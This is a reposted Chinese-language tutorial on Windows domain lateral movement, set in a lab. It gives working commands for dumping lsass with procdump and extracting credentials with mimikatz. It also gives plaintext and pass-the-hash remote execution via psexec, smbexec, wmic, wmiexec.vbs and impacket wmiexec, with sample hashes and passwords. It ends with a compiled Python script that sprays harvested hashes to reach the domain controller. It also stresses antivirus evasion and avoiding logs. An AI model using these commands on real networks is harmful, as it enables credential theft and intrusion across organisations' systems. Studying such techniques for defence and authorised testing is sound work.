基础24-域横向之smb&wmi传递

gclome

原文链接：基础24-域横向之smb&wmi传递

​
内容目录
案例1-Procdump+Mimikatz配合获取账号密码信息
案例2-域横向移动 SMB 服务利用-psexec,smbexec
案例3-域横向移动WMI服务利用-cscript,wmiexec,wmic(实战常使用)
案例4-域横向移动以上服务hash批量利用-python编译 exe

前期知识点1
windows2012以上版本默认关闭wdigest，攻击者无法从内存中获取明文密码。
windows2012以下版本如安装KB2871997补丁，同样页无法获取明文密码

解决思路/方法
1.利用hash传递(pt，ptk等)进行移动
2.利用其他服务协议(SMB,WMI等)进行哈希移动
3.利用注册表操作开启Wdigest Auth值进行获取(admin&system高权限)
4.利用工具或第三方平台(Hachcat)进行破解获取
前期知识点2
windows系统LM hash及NTLM Hash加密算法，个人系统在windows vista后，服务器在windows 2003以后，认证方式均为NTLM Hash。

案例一，Procdump+Mimikatz配合获取账号密码信息

前提：Mimikatz使用失败时，或者其他情况下，结合使用。(账号密码获取的第二方案)
procdump工具-微软官方
项目地址：https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump命令：
使用procdump将本地账号密码等保存到lsass.dmp

• 
  

procdump -accepteula -ma lsass.exe lsass.dmp

​

然后再使用mimikatz读取

1. 命令：
   
2. sekurlsa::minidump lsass.dmp
   
3. sekurlsa::logonPasswords full

复制代码

​
成功读取。
优势：免杀
​​
案例 2-域横向移动 SMB 服务利用-psexec,smbexec


利用SMB服务可以通过明文或hash传递来远程执行
条件:445服务端口开放
两种工具：1.psexec(官方工具) 2.smbexec(第三方工具)
psexec使用：

• 
  

项目地址：https://docs.microsoft.com/zh-cn ... loads/pstoolspsexec第一种使用：先建立ipc连接，再使用明文或者hash

• 
  

net use \\192.168.3.32\ipc$ "admin!@#45" /user:administrator

​

• 
  

psexec \\192.168.3.32 cmd -s

​

但在很多情况下，IPC连接会失败，所以推荐使用第二种方式
psexec第二种使用：不用建立IPC直接使用明文或hash[推荐]

• 
  

psexec \192.168.41.141 -u administrator -p admin1234@ -s cmd

​

直接返回system

• 
  

利用hash连接
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

​

失败，但是有解决办法，这里还是使用第三方工具。
非官方自带-参考 impacket 工具包使用，操作简单，容易被杀
smbexec 无需先建立ipc 链接，明文或hash传递皆可

• 
  

命令：
smbexec god/administrator:Admin12345@192.168.3.21

​

• 
  

smbexec ./administrator:admin!@#45@192.168.3.32

​

1. 利用hash连接的命令
   
2. smbexec -hashes :$HASH$ ./admin@192.168.3.21
   
3. smbbexec -hashes :$HASH$ domain/admin@192.168.3.21
   
4. smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
   
5. smbexec -hashes :ccef208c6485269c20db2cad21734fe7god/administrator@192.168.3.21

复制代码

总结：有明文尽量使用官方工具连接，如果只有hash那就使用第三方软件。
​
​
案例 3-域横向移动WMI服务利用-cscript,wmiexec,wmic(实战常使用)

WMI(Windows Management Instrumentation) 是通过 135 端口进行利用，支持用户名明文或者 hash 的方式进行认证，并且该方法不会在目标日志系统留下痕迹。
连接方法：
方法一:自带WMIC 明文传输 无回显

• 
  

命令：wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c ipconfig >C:\1.txt"

​

​

成功写入。
方法二:自带cscript明文传输 有回显
需要利用到wmiexec.vbs

• 
  

下载地址：https://www.secpulse.com/archives/32197.html

1. 命令：
   
2. cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

复制代码

​

​

直接返回，非常舒服????
方法三:套件impacket wmiexec 明文或hash传递 有回显版本exe版本


wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"

​

• 
  

wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"

​

1. 利用hash连接命令
   
2. wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
   
3. wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"

复制代码

​

优势：支持明文和hash，且都有回显
缺点：考虑免杀问题

​

​​

案例 4-域横向移动以上服务 hash 批量利用-python 编译 exe


收集域内账号，密码，hash，ip等等信息

​

​

编译后即可运行
将py编译成exepyinstaller.exe -F fuck_neiwang_002.py将vmiexec.exe放在同一目录下，py会调用
运行：

​

成功连接到jack用户，将得到的用户账号密码hash信息再次加入到字典中，继续爆破连接。

​

成功爆破到sqlserver等等等，不断信息收集，扩充字典，最后拿下域控机。(靶场而已，实战就难了)
​